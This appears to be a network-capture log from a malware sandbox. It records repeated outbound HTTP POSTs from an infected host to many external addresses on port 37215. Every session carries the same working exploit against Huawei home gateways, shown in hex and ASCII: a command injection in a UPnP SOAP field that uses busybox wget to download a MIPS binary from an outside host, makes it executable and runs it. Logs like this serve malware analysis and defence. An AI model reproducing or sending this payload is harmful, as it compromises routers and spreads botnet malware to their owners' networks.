                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            255192.168.2.134867441.154.147.5937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.197150946 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            256192.168.2.1354544197.181.198.13337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.198031902 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            257192.168.2.134070641.229.216.23137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.198882103 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            258192.168.2.133505841.251.58.23937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.199727058 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            259192.168.2.1338990197.73.57.10137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.200486898 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            260192.168.2.1356976156.79.171.437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.201248884 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            261192.168.2.1334464197.63.251.4937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.201992989 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            262192.168.2.134911441.206.110.18637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.202796936 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            263192.168.2.1345678197.246.123.24437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.203547001 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            264192.168.2.134556441.168.73.2437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.204323053 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 